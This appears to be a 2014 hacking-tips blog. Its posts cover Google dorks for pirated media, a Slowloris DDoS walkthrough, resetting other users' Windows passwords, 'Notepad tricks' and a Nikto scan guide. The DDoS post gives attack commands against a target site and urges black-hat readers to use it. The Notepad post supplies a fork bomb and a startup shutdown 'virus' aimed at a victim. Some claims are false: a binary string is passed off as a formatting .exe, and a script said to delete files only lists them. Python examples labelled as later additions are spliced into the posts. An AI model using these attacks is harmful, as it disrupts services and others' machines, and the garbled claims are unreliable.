Friday, July 25, 2014

Google Dork - A curse or A Blessing

It is said that everything you search for on Google returns some answer. But did you know that Google is so powerful that it can even reveal your private information?
This private information is accessed by many hackers in order to exploit you. Some of the same searches are also very helpful for making our search results more accurate and easy.

"Those who live the internet, for them it's a blessing, and those who know the internet, for them it's a curse. It depends upon you how you make it for you." Now we have done enough talking, let's get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they don't have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools aren't the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal w/ SEO (search engine optimization), which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a site's directory will eliminate that. You can narrow your search down easily by looking for the info in specific categories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isn't case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extension (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extension
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Let's say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? Search for: MP3 player $0..$90. The 2 periods set a numeric range to search between. This also works with dates, weights, etc.

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other people's PCs that they don't have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but that's a resolution preference, and 5X the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you don't find your answer in the web section, try the group section. Hell, try a whole different search engine. Don't limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

12. Search for specific file type
Use the engine to search for the specific file type like 3gp, mp4, pdf, xls, doc, etc...
ex. if you want to search for a pdf on hacking just visit google.com and in search type:- hacking filetype:pdf

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks it's useful info" then I will show you WHY (besides accuracy, speed, and consistency finding info on ANYTHING) it's nice to know how a search engine works. You combine it with your knowledge of other protocols.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example... I wanted to find some Sepultura. If you don't know about this Brazilian band then google them out.
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and that's without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

intitle:"index of" "google hacks" ebook
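Seen from the site owner's side, the intitle:"index of" searches above only return a server that publishes auto-generated directory listings. The following Python check is an added example, not part of the original post: run it over pages fetched from your own server to spot such listings and the file types they expose. The extension list, function names and sample HTML are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# File types the searches in this post look for (assumed list, extend as needed).
EXPOSED_EXTENSIONS = {"mp3", "mp4", "3gp", "pdf", "xls", "doc", "exe", "zip"}


class _ListingParser(HTMLParser):
    """Collects the <title> text and every link target on the page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.hrefs = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def audit_listing(html):
    """Report whether a page is an auto-generated index and what it exposes."""
    parser = _ListingParser()
    parser.feed(html)
    title = parser.title.strip()
    # Auto-index pages are titled "Index of /path", which is what intitle: matches.
    is_listing = bool(re.match(r"(?i)index of\b", title))
    exposed, subdirs = [], []
    if is_listing:
        for href in parser.hrefs:
            if href.startswith(("?", "/", "../")) or "://" in href:
                continue  # column-sort links, parent directory, external links
            if href.endswith("/"):
                subdirs.append(href)  # each subdirectory is another listing to check
                continue
            ext = href.rsplit(".", 1)[-1].lower() if "." in href else ""
            if ext in EXPOSED_EXTENSIONS:
                exposed.append(href)
    return {"is_listing": is_listing, "title": title,
            "exposed_files": exposed, "subdirectories": subdirs}


# Constructed sample pages (not taken from any real server).
SAMPLE_LISTING = """<html><head><title>Index of /music</title></head><body>
<h1>Index of /music</h1>
<a href="?C=N;O=D">Name</a>
<a href="/">Parent Directory</a>
<a href="live/">live/</a>
<a href="track01.mp3">track01.mp3</a>
<a href="setlist.PDF">setlist.PDF</a>
<a href="notes.txt">notes.txt</a>
</body></html>"""
SAMPLE_NORMAL = ("<html><head><title>Band news</title></head>"
                 "<body><a href='a.mp3'>a</a></body></html>")

if __name__ == "__main__":
    print(audit_listing(SAMPLE_LISTING))
    print(audit_listing(SAMPLE_NORMAL))
```

If a listing is reported for a directory that should not be browsable, turn automatic indexing off (`Options -Indexes` in Apache, `autoindex off` in nginx).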

***Now sometimes there are certain searches which are blocked by college and still we want to open those sites and download their content. If you want such tricks to open them without using proxy then contact me @ prashantsavior@gmail.com or comment below.

Article by: Unpredictable

Monday, July 7, 2014

Distributed Denial of Service Attack - DDoS attack (Part-1)

Hey guys! Sorry for being away for quite long. Today I am going to post on a very easy but harmful hack.
Many sites can easily be taken down this way; although the outage lasts only a short period, the site can still suffer a huge loss.
I hope many of you have guessed the topic of today's discussion. Yes, it's the Distributed Denial of Service (DDoS) attack.
We can perform this attack in many ways but today I am posting the tutorial on slowloris but before we start lets see what is DDoS attack.

About: DDoS, often simply called a Denial of Service attack, is one of the most powerful attacks and is very tough for any server to stop, although it takes time to perform.
In this attack a huge number of packets is sent to an open port of the site, usually port 80, or to any other port that is open and ready to accept packets.
This huge number of packets creates heavy traffic on the site and ultimately takes it down for as long as the attack continues or until the server blocks the IP address that is sending the packets.
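Seen from the server, a Slowloris-style source does not flood the port; it holds many connections open from one address by never finishing its HTTP request headers. The added example below (not from the original post) flags such sources in a snapshot of connection state so the address can be blocked; the record format, thresholds and sample data are assumptions constructed for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Conn:
    """One open connection as a server-side snapshot might describe it (assumed format)."""
    src_ip: str
    opened_at: float        # time the TCP connection was accepted, in seconds
    headers_complete: bool  # True once the blank line ending the request headers arrived
    header_bytes: int       # request bytes received so far


def find_stalled_sources(conns, now, min_age=10.0, max_stalled=20):
    """Return {ip: summary} for sources holding more than max_stalled connections
    whose request headers are still unfinished min_age seconds after connecting."""
    stalled = defaultdict(list)
    for c in conns:
        if not c.headers_complete and now - c.opened_at >= min_age:
            stalled[c.src_ip].append(c)

    report = {}
    for ip, items in stalled.items():
        if len(items) <= max_stalled:
            continue  # a handful of slow requests is normal on poor links
        ages = [now - c.opened_at for c in items]
        total_bytes = sum(c.header_bytes for c in items)
        report[ip] = {
            "stalled": len(items),
            "oldest_age": max(ages),
            # Legitimate requests send their headers in one burst; a very low
            # rate over a long-lived connection is the tell-tale sign.
            "bytes_per_conn_sec": round(total_bytes / sum(ages), 2),
        }
    return report


def worker_pressure(conns, max_workers):
    """Fraction of the server's worker slots currently occupied."""
    return len(conns) / max_workers


def build_sample(now=1000.0):
    """Constructed snapshot: one source holding 150 unfinished requests,
    40 normal clients, and one slow but legitimate client."""
    conns = []
    for i in range(150):
        conns.append(Conn("203.0.113.7", now - 60 - i * 0.1, False, 120 + i % 5))
    for i in range(40):
        conns.append(Conn(f"198.51.100.{i + 1}", now - 0.5, True, 480))
    conns.append(Conn("192.0.2.44", now - 12.0, False, 300))
    conns.append(Conn("192.0.2.44", now - 15.0, False, 310))
    return conns, now


if __name__ == "__main__":
    sample, t = build_sample()
    print("worker slots in use:", worker_pressure(sample, max_workers=256))
    for ip, info in find_stalled_sources(sample, t).items():
        print("block candidate:", ip, info)
```

Request-read timeouts (Apache `RequestReadTimeout` from mod_reqtimeout, nginx `client_header_timeout`) and per-address connection limits are the usual server-side controls for sources this check flags.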

Many of you must be wondering what will happen if a site goes down for a few hours.
Think about the big shopping sites like flipkart, ebay, amazon, etc.: if they go down for a few hours, how much of a loss will they suffer? Similarly, if someone attacks a stock exchange, just think how much unthinkable loss can happen in hours.

***Performing a DDoS attack is a cyber crime. So think before you act.
Words for white hat hackers: Report to the admin of the web page if you find any unimportant open port which is accepting packets.
Words for programmers: Please check your code and make sure most of the ports are closed and that the code is properly written and has no open segments.
Words for black hat hackers: Follow the tutorial to take down the site and don't forget to use proxy.

DDoSing via Slowloris:
Step 1: Download and install "active perl" from the link Click here to download Active Perl
Step 2: Download this slowloris script by clicking here Click here to download slowloris and save in any of your desired location and file extension as .pl (this is extension for perl script files). Like I have saved it in C:\downloads\DDOS\slowloris
Step 3: Open cmd by pressing windows+r (run dialog box appears) and then type cmd and hit enter.
Step 4: Go to the location by typing its address.
C:\downloads\DDOS
and press enter
Step 5: Run the slowloris script on the site. Here my target site is www.target-site.com
C:\downloads\DDOS> slowloris.pl -dns www.target-site.com -port 80 -timeout 1 -num 1000 -cache

Here you can change the port number to any other port which is open.

Check the site after few hours. Boom... You have taken it down.
For any query please comment below or write to us @ prashantsavior@gmail.com and don't forget to like our Facebook Page

Author: Unpredictable

Tuesday, May 27, 2014

CHANGE WINDOWS PASSWORD WITHOUT KNOWING THE OLD PASSWORD

Note: This trick works only if the computer is turned on and then you can change the password.

Step 1: Click on start and then search for cmd (i.e., command prompt).


Step 2: Right click and then click on Run as administrator. It will prompt for request to proceed. Click on OK and then the command window will open.

Step 3: Type net user. This command lists the names of all the user accounts present on the computer.

Step 4: Change the password of all the user account one by one by typing.
net user useraccount password
Here useraccount is the account which you got from the step 3 and in place of password type your desired password.

With these simple steps you can change your Windows password or even your friend's.

Author: Unpredictable

For more information feel free to contact us @ prashantsavior@gmail.com or you can even comment below.

Thursday, May 22, 2014

AWESOME NOTEPAD TRICKS

NOTEPAD TRICKS

Notepad can be used to make simple scripts which can sometimes be fruitful, sometimes enjoyable and sometimes destructive. It depends entirely upon you how you use this. In this tutorial I will show you how you can use notepad for various purposes.

Warning: Don't try some of these on your computer, as they may damage your OS. The status line of each trick says which ones to try and which not to.


Trick 1: Make your PC talk what you type.
Status: Must try it (safe to use).

Open your notepad and copy paste the following code and save it as speak.vbs . Here the file extension should be .vbs.

Dim msg, sapi
msg=InputBox("Enter your text","Talk it")
Set sapi=CreateObject("sapi.spvoice")

sapi.Speak msg

After you have saved it then open the vbs script, you will be prompted to enter text. Type the text and hear your PC say that.

Trick 2: Make your CD drive pop out constantly.
Status: Can try it (nearly safe)

Open your notepad and copy paste the following code and save it as cdrom.vbs . Here the file extension should be .vbs.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100

loop

After you have saved it then open the vbs script, your cd rom will pop out. Everytime you put it inside it will pop out.

How to stop: Press alt+ctrl+del, go to Processes, look for wscript.exe and stop it.

Trick 3: To make keyboard LED flash.
Status: You may try (nearly safe to use).

Open your notepad and copy paste the following code and save it as led.vbs . Here the file extension should be .vbs.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

After you have saved it then open the vbs script, all the LEDs on your keyboard will flash.

Trick 4: To Pop up fake error message.
Status: Must try it (safe to try)

Open your notepad and copy paste the following code and save it as fake.bat . Here the file extension should be .bat.

msg * Error: Your system is affected by virus

After you have saved it then open the bat file, you will get a fake error message popping out.

Trick 5: Format Hard disk.
Status: Don't try unless you need it (not safe).

Open your notepad and copy paste the following code and save it as format.exe . Here the file extension should be .exe.

Code : 01001011000111110010010101010101010000011111100000

After you have saved it then open the bat file, you will get a fake error message popping out.

Trick 6: Shutdown computer forcefully
Status: Safe to use

Open your notepad and copy paste the following code and save it as shutdown.bat . Here the file extension should be .bat.

@echo off
msg * Shutdown computer.
shutdown -s -c "Sleep Tight"

After you have saved it then open the bat file, your computer will shutdown forcefully.

Trick 7: Delete all the files
Status: Don't try on your laptop (try it on others unless he is your enemy)

Open your notepad and copy paste the following code and save it as delete.bat (don't change the filename). Here the file extension should be .bat.
This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable. 

 @echo off 
echo do you want to delete all of your computer data? (y/n) 
pause >nul
echo Do not exit out of the screen or all computer data will be deleted. 
ping localhost -n 2 > nul 
echo Are you sure you want to delete all computer data? (y/n) 
pause >nul 
echo deleting all data... 
echo. 
echo. 
ping localhost -n 2 > nul
dir /s 
echo. 
echo. 
ping localhost -n 2 > nul 
cls 
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n) 
pause 
echo. 
echo. 
ping localhost -n 1 > nul 
cls 
dir /s 
echo. 
echo. 
ping localhost -n 2 >nul 
cls 
echo all data has been deleted.. 
pause 
del "c:delete.bat" 

After you have saved it then open the bat file, your files will get deleted.

Trick 8: Command Prompt Virus
Status: You can try but you might not close that.
Open your notepad and copy paste the following code and save it as virus.bat. Here the file extension should be .bat.

start virus.bat 
virus.bat

This will open infinite command prompt.

Trick 9: Shutdown computer every time you start it.
Status: Don't Try (try it on your own risk)
Open your notepad and copy paste the following code and save it as anything.bat. Here the file extension should be .bat.


copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” 

//these two commands will copy the batchfile in start up folders (in XP)

shutdown -s -t 00 //this will shutdown the computer in 0 seconds 

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder.

Start up folder path in Windows 7 is 

C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Every time the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. 
How to stop: You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

Trick 10: Fork Bomb
Status: Try it on your own risk
Open your notepad and copy paste the following code and save it as fork.bat. Here the file extension should be .bat.

%0|%0 

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows.


Author: Unpredictable
If you have any query then comment below or you can write us @ prashantsavior@gmail.com.

Wednesday, May 21, 2014

WATCH LIVE TV FROM VLC

WATCH LIVE TV STREAMING USING VLC (watch for  free)


Do you know that you can watch live TV channel for free using vlc? For this you just need two things:
1. VLC media player (which you can download by clicking here. Click here to Download.
2. A Good internet speed.

So, now lets start with this.

Step 1: Open your vlc player.
Step 2: Click on Media then on click on Stream, or you can press Ctrl + S.



Step 3: Click on network and then paste the url of the stream channel. Here is the list of some channel. Rest you can Google it out and post in the comment to help others.


NDTV:       rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_33.sdp
NDTV Profit:  rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_31.sdp
Times Now:  rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_2.sdp
Aaj Tak:   rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_4.sdp
CNBC Aawaz:   rtsp://ss1c6.idc.mundu.tv:554/prf1/cid_34.sdp
CNBC TV 18:    rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_35.sdp
Headlines Today:   rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_7.sdp
NDTV 24×7:   rtsp://ss1c6.idc.mundu.tv:554/prf0/cid_29.sdp
NK News:   rtsp://94.75.250.53:554/rtplive/rknews.sdp
RAJ News:   rtsp://94.75.250.220:1935/live/rajnews2.sdp
ETV:   rtsp://94.75.250.53/rtplive/etv2low.sdp
Studio N:   rtsp://94.75.250.220:1935/live/studion2
SVBC:   rtsp://94.75.250.220/rtplive/svbclow
Zoo Vision:    rtsp://stream.zoovision.com/live.sdp
B4u Music:    rtsp://217.146.95.166:554/playlist/ch12zqcif.3gp
iMusic:   rtsp://217.146.95.166:554/playlist/ch26yqcif.3gp
Zee Tamil: rtsp://121.244.145.226:554/prf1/cid_54.sdp
Zee Kannad:   rtsp://121.244.145.226:554/prf1/cid_55.sdp
Zee Bangla:   rtsp://121.244.145.226:554/prf1/cid_52.sdp
Music Box:   rtsp://stream.the.sk/live/musicbox/musicbox-3m.3gp
Bella Tv:   rtsp://217.146.95.166:554/playlist/ch29yqcif.3gp
Fashion Tv:   rtsp://217.146.95.166:554/playlist/ch27yqcif.3gp
Adventure:    rtsp://video3.multicasttech.com/AFTVAdventure3GPP296.sdp
Horror:    rtsp://video2.multicasttech.com/AFTVHorror3GPP296.sdp
Comedy:   rtsp://video3.multicasttech.com/AFTVComedy3GPP96.sdp
Classic:    rtsp://video3.multicasttech.com/AFTVClassics3GPP296.sdp
Crime:   rtsp://video2.multicasttech.com/AFTVCrime3GPP296.sdp
Mystery:   rtsp://video2.multicasttech.com/AFTVMystery3GPP296.sdp

Clubbing Tv:   rtsp://217.146.95.166:554/playlist/ch21yqcif.3gp

Step 4: Then click on Play after choosing it from the drop down menu.


Enjoy it....

Author: Unpredictable

If you have a query then comment or mail us @ prashantsavior@gmail.com

Sunday, May 18, 2014

Website Scanning Through Nikto (in Backtrack 5)

Website Scanning Tutorial Through Nikto

When we talk about scanning a website to find vulnerabilities, we have many tools in Backtrack 5 / Kali Linux that serve well, and "Nikto" is one of them. These tools are used to measure the security level of web applications.

About Nikto:
  • Nikto is open source.
  • It can check a web server for over 6400 potentially dangerous files/CGIs.
  • It checks for outdated versions of over 1000 servers, and version specific problems on over 270 servers.
  • It checks the plug in and un-configured files.
  • Fast & Effective.
  • It finds out the default files and programs.
  • It finds out the insecure files and programs.
Features:


  • Full HTTP proxy support.
  • Apache user name enumeration.
  • Logging to Metasploit.
  • Secure Socket Layer support (SSL).
  • Sub-domain brute forcing (guessing).
  • Easy to update.
  • Saves reports in multiple formats.

Requirements:
  • Backtrack 5 / Kali Linux with Perl installed in it.

Tutorial:


The basic scan requires a host to scan, which means you need a website to scan. You can use the IP of the website or just its name. Here I have taken the website as http://www.mytargetsite.com/ . You can take the website which you want to scan.


Open Nikto by following this:



1. To scan a website for the vulnerability we type:
$ perl nikto.pl -host http://www.mytargetsite.com/
or
$ perl nikto.pl -h http://www.mytargetsite.com/



2. For help:
$ perl nikto.pl -H

3. If you want to check a different port then use:
$ perl nikto.pl -h http://www.mytargetsite.com/ -p [port number]



4. If you want to run this test via a proxy then you can use this command:
$ perl nikto.pl -h http://www.mytargetsite.com/ -useproxy http://localhost:8080/

5. Now for updating nikto use:
$ perl nikto.pl -update 

6. To search vulnerability in multiple port within a range (e.g., we are searching port no. 80 to 100):
$ perl nikto.pl -h http://www.mytargetsite.com/ -port 80-100

7. To save the scan result in a text file for later use:
$ perl nikto.pl -h http://www.mytargetsite.com/ -output ./filename.txt


Note: Nikto scans port no. 80 by default. If you want to scan different port then choose another port (step 3).

For any query comment below or write us @ prashantsavior@gmail.com

Article by: Unpredictable



                  Monday, May 12, 2014

                  INTRODUCTION TO FIREWALL

                  A basic Introduction to Firewalls

                  Introduction to firewalls 

                  When you use the internet in your college/school/office, you may not be able to access some websites.
                  So do you know how they block those websites? They use firewalls for blocking the websites.
                  A firewall protects the system from hackers' attacks. It also protects you from various viruses. You can say that it saves your cyber life, but only to some extent, as there is nothing absolute.

                  So lets see what actually is this firewall!!!



                  *** The first question arises in our mind is What is Firewall? 

                  --->A firewall works like a security guard standing outside the office. What does the security guard usually do? He allows those who have an identity card and blocks those who do not.

                  Likewise, the firewall blocks unauthorized access to the system. A firewall may be software or hardware. It works based on the set of rules defined by the administrator. Using a firewall, the administrator can block certain websites from being accessed. All traffic from inside and outside of the network must pass through the firewall. Only authorized traffic will be allowed to pass (based on the set of rules).

                  ***Second question which you must be thinking is what are the Types of Firewalls?

                  --->So here is a basic classification of types of firewall
                   (i) Packet Filtering 
                   (ii) Application level gateway
                   (iii) Circuit level gateway

                  (i) Packet Filtering (Network Layer):

                  A packet filtering router applies a set of rules to each incoming IP packet and then forwards or discards the packet. The router is configured so that it can filter incoming and outgoing packets. The packets are filtered based on the source and destination IP addresses. An IP spoofing attack is possible against this kind of packet filtering; IP spoofing is achieved by changing the source IP address of packets.

                  Stateful Inspection Firewalls:
                  A stateful inspection packet filter tightens the rules for TCP traffic by creating a state table of outbound TCP connections. If a packet matches an existing connection in the state table, it is allowed. If it does not match, it is evaluated according to the rule set for new connections.
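The difference between the two approaches described above, as an added Python example that is not part of the original post: the same five packets are run through a stateless packet filter and through a filter that keeps a state table of outbound TCP connections. The rule set (outbound web traffic only), class and function names, and addresses are constructed for illustration.

```python
from dataclasses import dataclass

WEB_PORTS = (80, 443)


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset   # TCP flags, e.g. {"SYN"} or {"SYN", "ACK"}
    direction: str     # "out" = leaving the inside network, "in" = arriving


def stateless_filter(pkt):
    """Packet filter: each packet is judged alone, by addresses and ports.
    Replies must be let in, so anything *claiming* to come from a web port passes."""
    if pkt.direction == "out":
        return pkt.dport in WEB_PORTS
    return pkt.sport in WEB_PORTS and pkt.dport >= 1024


class StatefulFilter:
    """Keeps a state table of outbound TCP connections.
    Simplification: real firewalls also track sequence numbers and timeouts."""

    def __init__(self):
        self.state = set()  # (inside_ip, inside_port, outside_ip, outside_port)

    def check(self, pkt):
        if pkt.direction == "out":
            key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        else:
            key = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if key in self.state:
            if "RST" in pkt.flags:
                self.state.discard(key)  # connection torn down
            return True
        # No matching entry: apply the rule set for NEW connections,
        # which only permits an outbound SYN to a web port.
        if pkt.direction == "out" and pkt.flags == {"SYN"} and pkt.dport in WEB_PORTS:
            self.state.add(key)
            return True
        return False


def run_demo():
    """Return (label, stateless verdict, stateful verdict) per constructed packet."""
    fw = StatefulFilter()
    syn, synack, ack = frozenset({"SYN"}), frozenset({"SYN", "ACK"}), frozenset({"ACK"})
    packets = [
        ("inside client opens HTTPS",
         Packet("10.0.0.5", 40000, "198.51.100.10", 443, syn, "out")),
        ("server reply on that connection",
         Packet("198.51.100.10", 443, "10.0.0.5", 40000, synack, "in")),
        ("unsolicited packet with source port 80",
         Packet("203.0.113.9", 80, "10.0.0.5", 40001, ack, "in")),
        ("spoofed server address, no such connection",
         Packet("198.51.100.10", 443, "10.0.0.5", 40002, ack, "in")),
        ("inbound connection attempt",
         Packet("203.0.113.9", 5555, "10.0.0.5", 22, syn, "in")),
    ]
    return [(label, stateless_filter(p), fw.check(p)) for label, p in packets]


if __name__ == "__main__":
    for label, stateless, stateful in run_demo():
        print(f"{label:45} stateless={stateless!s:5} stateful={stateful}")
```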

                  (ii) Application Level Gateway:

                  An application level gateway is also known as a proxy server. The user communicates with the gateway using the application layer of the TCP/IP stack. The gateway asks the user for the name of the remote host to be connected. When the user enters a valid user ID, the gateway gives access to the remote application. This blocks malicious activity and corrects the application behavior, which helps ensure the safety of the company. It is more secure than packet filtering, and it is easy to log and audit all incoming traffic at the application level. Application-level filtering may include protection against spam and viruses as well, and be able to block undesirable Web sites based on content rather than just their IP address.

                  (iii) Circuit Level Gateway:

                  The circuit level gateway works at the session layer of the OSI model. It monitors TCP handshaking between packets to make sure a session is legitimate. Traffic is filtered based on the session rules. Circuit-level firewalls hide the network itself from the outside, which is useful for denying access to intruders. But they don't filter individual packets. This firewall is used when the administrator trusts internal users.


                  ***So, Why Firewall?

                  --->A firewall blocks unauthorized users and prohibits vulnerable services from entering or leaving the network. It provides protection from IP spoofing and routing attacks, and protection against remote login, Trojan backdoors, session hijacking, cookie stealing, etc.


                  *** So by now you must be haunted by a question: does it have any limitations? If yes, then what are the limitations of firewalls?

                  --->The firewall cannot protect against attacks that bypass the firewall. The firewall does not protect against internal threats. The firewall cannot protect against the transfer of virus-infected programs or files. It would be impossible for the firewall to scan all incoming files and emails for viruses.


                  Author: Unpredictable

                  For query feel free to write us @ prashantsavior@gmail.com or comment below.
                  And don't forget to like us on Facebook